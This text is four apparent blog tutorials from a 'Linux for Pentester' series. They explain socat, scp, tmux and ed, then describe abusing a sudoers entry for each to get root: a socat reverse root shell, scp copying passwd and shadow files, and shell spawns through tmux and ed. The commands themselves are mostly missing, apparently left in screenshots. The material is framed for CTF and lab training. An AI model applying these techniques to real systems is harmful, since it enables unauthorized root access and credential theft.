Linux For Pentester: socat Privilege Escalation

Welcome back, to grab knowledge of another command from “Linux for pentester” series. As we know there are many tools that can help the user to transfer data. Similarly, we are going to take advantage of another command i.e. “socat” which is a utility for data transfer between two addresses. So, now we will take this benefit of “socat” in our mission of privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

Overview of socat             

  • What is socat
  • Basic parameters of socat
  • The operation achieved by socat

Abusing socat

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

What is socat

Socat is a network utility similar to netcat which supports ipv6, SSL and is available for both Windows and Linux. The first thing you will notice with this tool is that it has a different syntax on what you are used to with netcat or other standard Unix tools.

In other word you can say it is a command-line based utility that inaugurates two bidirectional byte streams and transfers data between them. Because the streams can be built from a large set of different types of data sinks and address type.

It is a utility for data transfer between two addresses which uses the syntax as “socat [options] <address><address>”.

Now we will start working with this most influencing tool by using its help command.

Basic parameters of socat

The most “basic” socat request would be: socat [options] <address><address>but another more existing example would be: socat -d -d – TCP4:www.example.com:80.

Where “-d -d” would be the options, “-“ would be the first address and TCP:www.example.com:80 would be the second address.

The above syntax can be more clearly understand by breaking each component down a bit more. Let’s first start with the address, since the address is the keystone aspect of socat.

Addresses:

As we know socat is comprised with two addresses for executing its result so it is more important to understand that what addresses are in actual and how they work. The address is something that the user provides via the command line. Entreating socat without any addresses results in a note as shown below:

~: socat

2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option “-h” for help

Type:

After address, the other component of “socat” is “type” which is used to specify the kind of address that we need. Some of popular selections are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE, UDP4 etc, where the names are pretty self-understandable.

This is because certain address types have aliases. Similarly “-“ is one such alias which is used to represent STDIO. Another alias is TCP which stands for TCPv4. You can also use its man page to view lists of all other aliases.

Parameters:

Instantly after the type socat comes with zero or more required address parameters for its performance which is separated by:

The number of address parameters depends on the address type. The address type TCP4 requires a server description and a port description.

The operation achieved by socat

To send and receive text messages bidirectional: As we know “Socat” is a command-line based utility that establishes two bidirectional byte streams and transfers data between them. Now, I will start to establish a connection between two machines and will transfer messages between both of them.

For this, we need to start listener at one machine. In below image we have done this for “kali” which is acting as a listener and ready to take all of the commands that are ordered by “ubuntu” as shown below by framing command:

After running listener, our next step is to use socat command on another machine i.e. “ubuntu”. Here we need to specify the “IP” and port of the machine on which we have started the listener.

Now we have succeeded to share text between both terminals as shown in below image.

EXEC command using socat to take shell: socat command also tends the user to take the shell of any machine.  Here in this tutorial, I wish to take the shell of “ubuntu” on “kali” terminal by “EXEC type”.

Now on framing above command, we have successfully established a connection between two of the machine. After running listener on “ubuntu” now we will use socat command on “kali” by specifying the” IP” and “port” of the machine (ubuntu) which will help us to take the shell of ubuntu on kali as per our request.

Now to check whether you have got the shell of the desired machine or not, you can simply write “id”. As in below image you can see, it has directed us as user “raj” which is a user of “ubuntu”. It means we have successfully got the shell.

EXEC command using socat to transfer file: Now we will use another function of “EXEC” to transfer a file, here I want to transfer “passwd” file from “ubuntu” to “kali and again we will follow the same process.

As we switch to kali and run socat command it will result in us by opening “passwd” file of “source machine”.

Working with socat using another type: As we know socat uses the list of “type” like CREATE, EXEC, STDIN, STDOUT, PIPE etc.

Here in the below image, I have a text file named as “test” and now I want my listener machine to execute this file.

By using the above command first I have requested to open “test” file then I have pipe this output as the input for socat command.

As from below image you can see I have used “OPEN” function to which I have requested to create a file

 by the name of “raj” and will append the content of “test” file to this newly created file i.e. “raj”.

So now when I will run listener at “ubuntu” it will execute “raj” file showing the content of

“test” file as per desire.

Abusing socat

Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission for privilege escalation. For this alike another command from “Linux for pentester” series here also first we need to set up our lab of “socat” command with administrative rights.

It can be clearly understood by the below image in which I have set sudo permission to local user (test) who can now run “socat command” as the root user.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

First Method:

Now we will start exploiting socat facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of a victim’s machine then only we can execute this task.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

As we know “test” user attains sudo user privileges so now we will try to attain root shell of the host’s machine by the help of socat using EXEC options. Then we look for sudo right for “test” user (if given) and found that user “test” can execute the socat command as “root” without a password.

On a new terminal launch socat as a listener and enter the source IP and source port along with socat command to obtain reverse shell of the host machine.

Now we have successfully got the shell of victim’s machine with root privilege as shown in below screenshot.

Second Method:

We have another method to escalate the higher privilege shell i.e. using socat one liner reverse shell command. 

On new terminal start the socat as a listener and obtain root shell of the remote machine.

Conclusion: Hence in this way, we can make use of “socat” command to escalate the privilege of the remote machine.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester: scp Privilege Escalation

In this article, we are going to introduce another most helpful Linux command i.e. “scp” which is an abbreviated form of “secure copy”. The SCP command allows secure transferring of files between the local host and the remote host or between two remote hosts. So after knowing this fact we will check now how we can take advantage of this utility in privilege Escalation. 

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

Introduction to scp

Major Operation performed using scp

  • Copy a file from the local system to the remote machine
  • Copy a file from a remote system to the local machine
  • Provide modification time and date
  • To display detailed information of the SCP process
  • Copying file inside directory recursively
  • To specify a specific port

Exploiting scp

  • Abusing Sudo right

Introduction to scp

Scp is a built-in command in Linux which is used to SCP is used to copy file(s) between servers in a secure way or in other words we can also say that it is a command-line utility that allows you to securely copy files and directories between two locations. This possesses the same authentication and safety as it is used in the Secure Shell (SSH) protocol. SCP is also known for its effortlessness, security and pre-installed accessibility.

Major Operation performed using scp

In this tutorial, we will show you how to use the scp command with detailed explanations of the most common scp options. For this, we will start from its help command as per below image.

After checking for its help command now we will proceed to its major operation one by one.

Copy a file from local system to remote machine: As we know the scp command tends the user to securely copy the file or directory from local to host connection or vice-versa so, by taking the help of this fact now we will copy a file whose name as “scan.xml” which is stored in my local system. For doing this we will frame command as below:

In the above command “scan.xml” is the file name that I want to copy, “aarti” is a remote user name, “192.168.1.31” is remote machine IP and ” /home/aarti/Desktop” is the path of the remote machine where I want to copy this file.

Once we have done with our command then it will be prompted to enter the user password and the transfer process will start.

Note: Omitting the filename from the destination location copies the file with the original name. If you want to save the file under a different name you need to specify a new name too.

Hence on following above syntax, our desired file has been successfully copied to a destination location on the remote system as shown below.

Copy a file from the remote system to the local machine: Alike above we can also copy a file or directory from its remote machine to the local system. For grabbing this functionality follow the below command.

On framing above command, we will again be prompted to enter the user password and the transfer process will start.

Hence our desired file has been successfully copied to a destination location on the local system from the remote system.

Provide modification time and date: Many times, you might be noticed that by default the time and date of the copied file is used to be set for current time and date.

As in below image you can notice that our “demo.txt” file showing its “current date and time” when it has been copied.

But in the below image, I have shown the original date and time i.e. when the file had created.

So if we want to make a modification of our copied file as its original details then we will use the “-p” option for this. After adding this argument our file will be copied with its original date and time instead of copying with current details.

To display detailed information of the SCP process: As in all above screenshot you can see that after you enter the password for copy the file there is no information about the SCP process but the only thing is it will prompt again once the process has been completed. So, if you want the detailed information of the SCP process, then you can use the “-v” parameter for this.

Copying the file inside directory recursively: Sometimes we need to copy directory and all files/directories inside it. It will be better if we can do it in 1 command. SCP support that scenario using the “-r” parameter.

In the below image, I have copied a file “fluxion” recursively.

Note: The speed for the process of copying any file is totally based upon its data length but we can increase this speed by using “-C” option which results faster for copy the file.

Here in the below image, we have successfully copied fluxion.

To specify a specific port: Usually, SCP uses port 22 as a default port. But for security reason, if you wish to change the port into another port then you can use the “-P” argument for this task.

For example, we are going to use port 2222. Then the command needs to be 

Lab setups for Sudo Privilege Escalation

Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Now we will start to perform privilege escalation for “scp”. For doing so we need to set up our lab of scp command with administrative rights.

After that, we will give Sudo permission on scp, so that a local user can take the privilege of scp as the root user.

Hence type following for enabling SUID:

It can be clearly understood by the below image in which I have created a local user (test) and will add sudo right for scp program in the /sudoers file and type following as user Privilege specification.

First Method

Then we will look for sudo right of “test” user (if given) and found that user “test” can execute the scp command as “root” without a password.

On framing below command, it will direct us on root shell as shown below and we will successfully accomplish our task.

Second Method

For proceeding further in our task of privilege escalation by the help of the second method very first we need to check the status for ssh service which should be active during our entire process (Kali Linux).

Now I wish to copy passwd and shadow file of the host machine (Ubuntu) as per below image by the help of scp command.

On framing above command it will prompt to enter the user password so that the transfer process will start.

Once you are done with this then you can check whether your file has successfully copied or not by framing below command.

Conclusion: Hence we have achieved our mission and successfully copied passwd and shadow file by the use of scp command.

Reference: https://gtfobins.github.io/

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux For Pentester: tmux Privilege Escalation

In this article, we are going to describe “tmux” which is also known as a terminal multiplexer.  It allows multiple terminal sessions to be retrieved concurrently in a single window. It is useful for running more than one command-line program at the same time.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

  • What is tmux
  • How to use tmux
  • tmux framework
  • tmux commands
  • Assigning Sudo rights
  • Exploiting Sudo rights

What is tmux?: tmux is also known as a terminal multiplexer which creates a host server on your Linode and connects to it with a client window. If the client is disconnected, the server keeps running and as you reconnect to your Linode after rebooting your computer, you can reattach to the tmux session and the files you were working with will still be open.

In other words, we can also say that this is a tool by the help of which we can open multiple windows and split views (called “panes” in tmux lingo) within one terminal window.

How to use tmuxAlike other tmux also supports many commands to perform its function. Now we will describe each of its major operations one by one.

It can be attained by entering a key combination called the prefix and then typing a letter. There are many letters that are assigned to tmux for performing its task.

tmux framework: The entire operations that a tmux does can be easily understood by its hierarchical structure as shown below.

tmux commands: There are list of command that can help while working with tmux. Here in this article, we are running the major operation that can be performed by the help of tmux.

Very first we will start from its help command. For this we need to write “–help” on our kali terminal as shown below.

The tmux operations are categorized into 3 selection which I have described above in its framework. So now we will start from first step i.e “sessions”

Operate tmux Sessions: Sometimes even multiple windows and panes aren’t enough and you need to separate the layouts logically by grouping them into separate sessions.

Sessions are useful for completely separating work environments.

There are many operations for the session using tmux which is shown in below image but I’m describing few of them.

  • Create a new session: To create a new session we will frame command as shown in the below image.

In the above command “-s” is used as an argument for a new session and “Ignite” is the name of the new session that I want to create.

On framing above command tmux will create a new session by the name of Ignite which will highlight at the bottom of terminal. Similarly, one can create multiple session by a different name as per need.

  • To list all created session: once we have done with creating all session as per desire then we can check it by command as:

This will list all session as output that have been created. In below image tmux has listed all session which I have created by following the same procedure as above.

Operate tmux Window: When a tmux session starts, a single-window is fashioned by default but tmux also supports a utility to attach multiple windows to the same session and we can switch between them as needed. This can be supportive when you want to run numerous jobs in parallel.

Apart from creating multiple windows it also possesses many operations like rename any window, switch between window and many others.

At the initial phase, it shows “0: bash*” by default in which 0 represents the index value of window bash is the window name which can be renamed as per need * denotes the working location and when we create new window tmux highlights all window at the bottom of the terminal.

Note: We know that working of tmux is done with joining prefix with any letter as per requirement. Find the below table to understand it clearly.

In this article, I have created 5 windows as shown in the below image. We know that working of tmux is done with joining prefix with any letter as per requirement.

  • Create new window: For creating a new window we will use “-c” with the prefix (ctrl-b).

This will create a new window. You can use the same procedure for creating multiple windows as below image.

  • Rename window: by default, tmux mention the window name as “bash” but we can also change it as per our wish. Here I’m renaming my last window as shown below.

  • To switch window: we can also switch within multiple windows that help to provide the platform of working parallel. It can be done in many ways.

  • To display summary: To see the entire summary for whatever we have done till now we will use tmux option as:

Operate tmux Panes: By the help of tmux, we can divide each window into multiple panes. This is useful when you want outputs from multiple processes visible within a single window.

In this we have many options such as divide window into vertical, horizontal, rotating panes, switching to different panes. Now we will check each of this one by one.

Note: use below table for your reference

Here I have divided my window into 2 panes vertically by the command as:

In the below image, I have further sub-divide my window horizontally.

Suppose we have multiple panes containing some of the information in each and we want to rotate our panes if we desire. Then will follow the step as:

On framing above command tmux will simply move the current pane to left.

Assigning Sudo Rights

Sudo right is a type of permission that allows users to execute a file with super user permissions. Now we will start to perform privilege escalation for “tmux”. For doing so we need to set up our lab of tmux command with administrative rights. After that, we will check for the “tmux command” that what effect it has after getting sudo rights.

After that, we will give Sudo permission on tmux so that a local user can take the privilege of tmux as the root user.

Hence type following for enabling Sudo:

It can be clearly understood by the below image in which I have created a local user (test). To add sudo right open /sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting tmux service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we will look for sudo right of “test” user (if given) and found that user “test” can execute the tmux command as “root” without a password.

Now after knowing the fact that test user attains sudo rights so, taking this benefit here, we can use tmux command to escalate the privileges of the test user.

Conclusion: This will launch a new terminal with root privilege shell.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester: ed Privilege Escalation

Here in this article, we are going to introduce a line-oriented text editor command i.e. “ed” which is used to generate, display, alter and operate text files. All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines; the “m” command moves lines, “t” command copy the lines and so on, therefore, now we will check that how we can successfully execute our task of Privilege Escalation by accomplishing all these significant of “ed” command.

Table of Content

Overview to ed                               

  • Summary to ed
  • Primary Action attained using ed

Abusing ed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to ed

ed command in Linux is used for initiation of the “ed text editor” which is a line-based text editor. Its minimal interface tendency makes it less complex for working on text files. It helps user to perform many operations like creating, editing, displaying and manipulating the files.

Editing is done in two distinct modes: “command and input”. In the “command” mode “ed” reads command from the standard input and execute to manipulate the contents of the editor buffer whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters for its “input mode”.

It is the oldest editor which was developed in 1969 in the UNIX and is succeeded by vi and emacs text editor.

Now type its help command to know more about “ed”.

Fundamental activities achieved by “ed”: As we know “ed” does many operations so now we will go through to its entire functionality one by one.

Initializing file with ed: At the initial phase, the terminal space will seem to be like as below image when the command is run . By default, the editor creates an empty buffer to write, similar to the way any other command-line based editor works when you invoke it without a file name.

Now we will start to create a text file that contains some text within it. For doing so very first we will press ‘a’ before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note: The main thing that needs to remember is to use ‘a’ (initial) and ‘.’ (Final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use ‘w’ followed by a file name of own choice which helps to save the file by the desired name as well as will also display the total no. of bytes that a file contains, and then ‘q’ to quit the editor.

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

Note Every time we need to use ‘a’, ‘.’, ‘w’, ‘q’ command whenever we use any option of ed command.

Change any specific line: Till now we have learnt basic editing using ed, now let’s move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in the below image, it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’ it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

Once you achieved the line where you want to make a change, then you can enter ‘c’ to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save the file by following the same process.

Display error message by the use of ed: When you type something which ed can’t understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as an unknown command for option ‘b’.

Copy and move operation by ed: Apart from all above discussed function ed also gives the option for copy and paste a line at some other location, in this case, we use ’t’ command to copy the line and ‘m’ to move any line. You need to precede’t’ with the line number to which you want to copy and append the destination line number. For example, as in the below image, I have copied the 5th line to position 0 and will save changes.

In above-mentioned command 5 is representing to the line which needs to copy and 0 is representing to the line no. for where it needs to be copied.

Note: One can also use’ instead of ‘t’ if he/she wants to move the line to another place.

Search operation using ed: Searching for any line by its keyword can be easily done by ed.  For doing so first we will use “-p%” followed by ed which will prompt you further for your search mission. After that to search forward, enter/followed by the search keyword. The moment at which you press enter, the editor will display the first line (containing the keyword) it encounters. You can run that command again to continue searching.

Here in below image ed has printed only those line as output which consists search keywords i.e. misconfiguration and Linux.

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. For doing so we need to set up our lab of ed command with administrative rights. After that, we will check for the “ed command” that what effect it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting ed service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the ed command as “root” without a password.

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use ed command to access empty buffer to call bash/sh shell, with higher privileges if permitted on sudo.

Conclusion: Hence we have efficaciously exploited “ed” by attaining its functionality after granting higher privilege.  

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here